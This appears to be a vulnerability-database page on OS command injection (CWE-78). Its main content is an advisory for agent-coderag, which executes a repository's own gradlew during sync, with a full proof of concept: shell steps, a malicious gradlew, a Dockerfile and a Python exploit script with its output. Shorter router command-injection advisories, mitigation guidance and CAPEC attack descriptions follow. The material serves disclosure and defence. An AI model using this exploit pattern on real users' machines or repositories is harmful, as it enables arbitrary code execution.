        if marker_content and "CODERAG_RCE_SUCCESS" in marker_content:
            print("\n[PASS] Exploit confirmed.")
            print(f"       Marker file : {MARKER_PATH}")
            print(f"       Contents    : {marker_content!r}")
            print("       The malicious gradlew was executed by agent-coderag during sync.")
            return 0
        else:
            print("\n[FAIL] Marker file not found or does not contain the expected string.")
            print(f"       Expected : 'CODERAG_RCE_SUCCESS'")
            print(f"       Got      : {marker_content!r}")
            return 1
    finally:
        shutil.rmtree(evil_repo, ignore_errors=True)


if __name__ == "__main__":
    sys.exit(main())
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.3.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "agent-coderag"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T15:01:06Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Gradle Wrapper Execution During Dependency Discovery Enables Arbitrary Code Execution\n\n### Summary\n\n`agent-coderag` unconditionally executes a repository-controlled `gradlew` script during its default `sync` dependency-discovery flow. An attacker who can induce a victim to index a malicious Gradle repository (one containing `build.gradle` and a crafted `gradlew`) achieves arbitrary code execution with the victim\u0027s OS privileges. No authentication, no extra flags, and no elevated permissions are required; the attack fires on the default `agent-coderag sync \u003cpath\u003e` invocation.\n\n### Details\n\nThe vulnerability exists across a four-step call chain in the `sync` command:\n\n**1. Entry point \u2014 `code_rag/entry/cli.py:70`**\n\n```python\nawait manager.sync_dependencies(args.path or \".\")\n```\n\n`sync_dependencies()` is called unconditionally before indexing. There is no opt-in flag; any `agent-coderag sync` invocation triggers dependency discovery.\n\n**2. Gradle project detection \u2014 `code_rag/core/manager.py:40-47`**\n\nThe presence of a `build.gradle` or `build.gradle.kts` file in the target directory is sufficient to invoke `_sync_gradle()`. No additional checks are performed.\n\n**3. Wrapper selection \u2014 `code_rag/core/manager.py:110-113`**\n\n```python\ngradle_wrapper = root / (\"gradlew.bat\" if os.name == \"nt\" else \"gradlew\")\ngradle_bin: Optional[str] = None\nif gradle_wrapper.exists():\n    gradle_bin = str(gradle_wrapper.resolve())\nelse:\n    gradle_bin = shutil.which(\"gradle\")\n```\n\nWhen a repository-local `gradlew` exists, it is unconditionally preferred over the system-installed `gradle`. No content validation, signature check, or integrity verification is performed on this file.\n\n**4. Execution sink \u2014 `code_rag/core/manager.py:152-158`**\n\n```python\nprocess = await asyncio.create_subprocess_exec(\n    gradle_bin,\n    \"-q\",\n    \"--init-script\",\n    str(init_script),\n    \"printCodeRagCP\",\n    cwd=str(root),\n    ...\n)\n```\n\nThe attacker-controlled `gradlew` is executed directly via `asyncio.create_subprocess_exec()` with the repository root as the working directory. `validate_path` (`code_rag/core/utils.py:7-71`) only constrains the path location (directory boundary), not the content or nature of the executed binary.\n\nThe complete data flow: `cli.py:277` (path input) \u2192 `cli.py:313-314` (`sync_cmd`) \u2192 `cli.py:62` (`validate_path`) \u2192 `cli.py:70` (`sync_dependencies`) \u2192 `manager.py:40-47` (`_sync_gradle`) \u2192 `manager.py:110-113` (wrapper selection) \u2192 `manager.py:152-158` (execution sink).\n\n### PoC\n\n**Environment setup:**\n\n```bash\npython3 -m venv /tmp/acr-venv\n. /tmp/acr-venv/bin/activate\npip install agent-coderag==1.3.0\n\nrm -rf /tmp/acr-evil /tmp/acr.db /tmp/agent-coderag-poc-marker\nmkdir -p /tmp/acr-evil\n```\n\n**Build the malicious repository:**\n\n```bash\n# Trigger _sync_gradle() detection\nprintf \u0027plugins { id \"java\" }\\n\u0027 \u003e /tmp/acr-evil/build.gradle\n\n# Malicious gradlew: writes proof-of-exploitation marker and exits cleanly\nprintf \u0027#!/bin/sh\\nprintf CODERAG_RCE_SUCCESS \u003e /tmp/agent-coderag-poc-marker\\nexit 0\\n\u0027 \\\n    \u003e /tmp/acr-evil/gradlew\nchmod +x /tmp/acr-evil/gradlew\n```\n\n**Trigger the vulnerability (victim action):**\n\n```bash\nagent-coderag --db /tmp/acr.db sync /tmp/acr-evil\n```\n\n**Verify exploitation:**\n\n```bash\ncat /tmp/agent-coderag-poc-marker\n# Expected output: CODERAG_RCE_SUCCESS\n```\n\n**Docker-based reproduction (as confirmed in Phase 2):**\n\n```bash\n# Build image from repository root\ndocker build -t agent-coderag-vuln001 -f vuln-001/Dockerfile .\n\n# Run PoC \u2014 exits 0 on successful exploitation\ndocker run --rm agent-coderag-vuln001\n```\n\nPhase 2 dynamic reproduction confirmed the following output:\n\n```\n[*] Evil repo created at /tmp/acr-evil-i560afcg\n    build.gradle : 22 bytes\n    gradlew      : 275 bytes  (executable=True)\n[*] Running: agent-coderag --db /tmp/acr-poc.db sync /tmp/acr-evil-i560afcg\n[*] agent-coderag exit code : 0\n[PASS] Exploit confirmed.\n       Marker file : /tmp/acr-poc-marker\n       Contents    : \u0027CODERAG_RCE_SUCCESS\u0027\n       The malicious gradlew was executed by agent-coderag during sync.\n```\n\n### Impact\n\nThis is an **Arbitrary Code Execution (ACE)** vulnerability triggered by a local attack vector. Any user who runs `agent-coderag sync` against an attacker-controlled directory is affected. The attack requires no authentication and no special privileges beyond the ability to supply a path argument.\n\nTypical impacted scenarios include:\n\n- A developer cloning an untrusted repository and running `agent-coderag sync` to index it for AI-assisted code analysis.\n- A CI/CD pipeline that automatically indexes pull-request branches containing a crafted `gradlew`.\n- Any tooling or script that passes arbitrary paths to `agent-coderag sync` without user oversight.\n\nBecause the vulnerable component (`agent-coderag`) is a code-indexing tool intended to *read* repositories, victims have no expectation that indexing will *execute* files within the repository. This trust-boundary violation (reflected in the CVSS `S:C` \u2014 Changed Scope) means the impact extends beyond the tool itself to the victim\u0027s entire user session environment: confidentiality (credential theft, secret exfiltration), integrity (file modification, persistence installation), and availability (process termination, disk exhaustion) are all fully compromised.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\nFROM python:3.11-slim\n\nLABEL description=\"VULN-001 PoC: agent-coderag gradlew RCE reproduction\"\n\nWORKDIR /app\n\nRUN apt-get update \u0026\u0026 apt-get install -y --no-install-recommends \\\n    \u0026\u0026 rm -rf /var/lib/apt/lists/*\n\n# Install agent-coderag from local repo source (pinned to vulnerable commit)\nCOPY repo/ /app/repo/\nRUN pip install --no-cache-dir /app/repo/\n\n# Copy PoC script\nCOPY vuln-001/poc.py /app/poc.py\n\nCMD [\"python3\", \"/app/poc.py\"]\n```\n\n#### `poc.py`\n\n```python\n\"\"\"\nPoC for VULN-001: agent-coderag Gradle Wrapper Execution \u2192 Arbitrary Code Execution\n\nVulnerability:\n    agent-coderag `sync` command calls sync_dependencies() unconditionally.\n    When the target directory contains a build.gradle file, _sync_gradle() is triggered.\n    _sync_gradle() prefers a repository-local ./gradlew over the system gradle binary.\n    The repository-controlled gradlew is executed via asyncio.create_subprocess_exec()\n    without any content validation, enabling arbitrary code execution.\n\nData flow (source \u2192 sink):\n    cli.py:70  \u2192 manager.sync_dependencies()\n    manager.py:46 \u2192 _sync_gradle()\n    manager.py:112-113 \u2192 gradle_bin = str(gradle_wrapper.resolve())  [untrusted file]\n    manager.py:152-158 \u2192 asyncio.create_subprocess_exec(gradle_bin, ...)  [sink]\n\nExpected outcome:\n    The malicious gradlew writes a marker to /tmp/acr-poc-marker.\n    If that file contains \"CODERAG_RCE_SUCCESS\", the exploit is confirmed.\n\"\"\"\n\nimport asyncio\nimport os\nimport shutil\nimport stat\nimport subprocess\nimport sys\nimport tempfile\nfrom pathlib import Path\n\n\nMARKER_PATH = \"/tmp/acr-poc-marker\"\nDB_PATH = \"/tmp/acr-poc.db\"\n\nMALICIOUS_GRADLEW = \"\"\"\\\n#!/bin/sh\n# Malicious gradlew: writes a proof-of-exploitation marker and simulates\n# enough Gradle output for agent-coderag to continue without error.\nprintf \u0027CODERAG_RCE_SUCCESS\u0027 \u003e /tmp/acr-poc-marker\n# Output a fake empty classpath so the tool does not log an error\nexit 0\n\"\"\"\n\nBUILD_GRADLE = \"plugins { id \u0027java\u0027 }\\n\"\n\n\ndef setup_evil_repo(directory: str) -\u003e None:\n    \"\"\"Create a minimal attacker-controlled Gradle repository.\"\"\"\n    repo_path = Path(directory)\n    repo_path.mkdir(parents=True, exist_ok=True)\n\n    # build.gradle triggers _sync_gradle() in manager.py:46\n    (repo_path / \"build.gradle\").write_text(BUILD_GRADLE)\n\n    # gradlew will be executed by manager.py:152 instead of system gradle\n    gradlew = repo_path / \"gradlew\"\n    gradlew.write_text(MALICIOUS_GRADLEW)\n    gradlew.chmod(gradlew.stat().st_mode | stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH)\n\n    print(f\"[*] Evil repo created at {directory}\")\n    print(f\"    build.gradle : {(repo_path / \u0027build.gradle\u0027).stat().st_size} bytes\")\n    print(f\"    gradlew      : {gradlew.stat().st_size} bytes  (executable={os.access(gradlew, os.X_OK)})\")\n\n\ndef run_agent_coderag(evil_repo: str) -\u003e subprocess.CompletedProcess:\n    \"\"\"Invoke agent-coderag sync against the malicious repository.\"\"\"\n    cmd = [\"agent-coderag\", \"--db\", DB_PATH, \"sync\", evil_repo]\n    print(f\"[*] Running: {\u0027 \u0027.join(cmd)}\")\n    result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)\n    return result\n\n\ndef check_marker() -\u003e str | None:\n    \"\"\"Return the marker content if it was written by the malicious gradlew.\"\"\"\n    try:\n        return Path(MARKER_PATH).read_text()\n    except FileNotFoundError:\n        return None\n\n\ndef main() -\u003e int:\n    # Clean up any leftovers from a previous run\n    for path in (MARKER_PATH, DB_PATH):\n        if os.path.exists(path):\n            os.remove(path)\n\n    evil_repo = tempfile.mkdtemp(prefix=\"acr-evil-\")\n    try:\n        # Step 1 \u2014 build the attacker-controlled repository\n        setup_evil_repo(evil_repo)\n\n        # Step 2 \u2014 invoke agent-coderag (victim action: indexing an untrusted repo)\n        result = run_agent_coderag(evil_repo)\n        print(f\"[*] agent-coderag exit code : {result.returncode}\")\n        if result.stdout:\n            print(f\"[*] stdout:\\n{result.stdout.rstrip()}\")\n        if result.stderr:\n            print(f\"[*] stderr:\\n{result.stderr.rstrip()}\")\n\n        # Step 3 \u2014 verify the marker was written by the malicious gradlew\n        marker_content = check_marker()\n        if marker_content and \"CODERAG_RCE_SUCCESS\" in marker_content:\n            print(\"\\n[PASS] Exploit confirmed.\")\n            print(f\"       Marker file : {MARKER_PATH}\")\n            print(f\"       Contents    : {marker_content!r}\")\n            print(\"       The malicious gradlew was executed by agent-coderag during sync.\")\n            return 0\n        else:\n            print(\"\\n[FAIL] Marker file not found or does not contain the expected string.\")\n            print(f\"       Expected : \u0027CODERAG_RCE_SUCCESS\u0027\")\n            print(f\"       Got      : {marker_content!r}\")\n            return 1\n    finally:\n        shutil.rmtree(evil_repo, ignore_errors=True)\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```",
  "id": "GHSA-wg5p-8h9p-3mr7",
  "modified": "2026-06-19T15:01:06Z",
  "published": "2026-06-19T15:01:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/naranor/agent-coderag/security/advisories/GHSA-wg5p-8h9p-3mr7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/naranor/agent-coderag"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "agent-coderag: Gradle Wrapper Execution During Dependency Discovery Enables Arbitrary Code Execution"
}

GHSA-WG68-F4GP-9Q35

Vulnerability from github – Published: 2025-07-11 21:31 – Updated: 2025-07-11 21:31
VLAI
Details

Linksys E1000 devices through 2.1.02, E1200 devices before 2.0.05, and E3200 devices through 1.0.04 allow OS command injection via shell metacharacters in the apply.cgi ping_ip parameter on TCP port 52000.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-3307"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-11T19:15:22Z",
    "severity": "HIGH"
  },
  "details": "Linksys E1000 devices through 2.1.02, E1200 devices before 2.0.05, and E3200 devices through 1.0.04 allow OS command injection via shell metacharacters in the apply.cgi ping_ip parameter on TCP port 52000.",
  "id": "GHSA-wg68-f4gp-9q35",
  "modified": "2025-07-11T21:31:04Z",
  "published": "2025-07-11T21:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-3307"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20140421001918/https://www.trustwave.com/spiderlabs/advisories/TWSL2013-008.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WG88-6PQ6-WM93

Vulnerability from github – Published: 2025-08-26 03:44 – Updated: 2025-11-04 00:32
VLAI
Details

Three OS command injection vulnerabilities exist in the web interface I/O configuration functionality of MC Technologies MC LR Router 2.10.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability refers to the authetnicated OS Command injection that occurs through the attacker-controlled timer1 parameter, at offset 0x8e80.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-28027"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-21T15:15:28Z",
    "severity": "HIGH"
  },
  "details": "Three OS command injection vulnerabilities exist in the web interface I/O configuration functionality of MC Technologies MC LR Router 2.10.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability refers to the authetnicated OS Command injection that occurs through the attacker-controlled `timer1` parameter, at offset `0x8e80`.",
  "id": "GHSA-wg88-6pq6-wm93",
  "modified": "2025-11-04T00:32:06Z",
  "published": "2025-08-26T03:44:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28027"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1953"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1953"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WGM4-M2JM-JG3M

Vulnerability from github – Published: 2022-05-14 01:40 – Updated: 2022-05-14 01:40
VLAI
Details

Aterm HC100RC Ver1.0.1 and earlier allows attacker with administrator rights to execute arbitrary OS commands via export.cgi encKey parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0637"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-01-09T23:29:00Z",
    "severity": "HIGH"
  },
  "details": "Aterm HC100RC Ver1.0.1 and earlier allows attacker with administrator rights to execute arbitrary OS commands via export.cgi encKey parameter.",
  "id": "GHSA-wgm4-m2jm-jg3m",
  "modified": "2022-05-14T01:40:47Z",
  "published": "2022-05-14T01:40:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0637"
    },
    {
      "type": "WEB",
      "url": "https://jpn.nec.com/security-info/secinfo/nv18-011.html"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN84825660/index.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

If at all possible, use library calls rather than external processes to recreate the desired functionality.

Mitigation MIT-22
Architecture and Design Operation

Strategy: Sandbox or Jail

  • Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
  • OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation
Architecture and Design

Strategy: Attack Surface Reduction

For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field.

Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-4.3
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
Mitigation MIT-28
Implementation

Strategy: Output Encoding

While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).

Mitigation
Implementation

If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line.

Mitigation MIT-27
Architecture and Design

Strategy: Parameterization

  • If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
  • Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.
  • Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.
  • Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.
Mitigation MIT-21
Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
  • In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used.
Mitigation
Operation

Strategy: Sandbox or Jail

Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Mitigation MIT-16
Operation Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

CAPEC-108: Command Line Execution through SQL Injection

An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-43: Exploiting Multiple Input Interpretation Layers

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

CAPEC-6: Argument Injection

An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.

CAPEC-88: OS Command Injection

In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.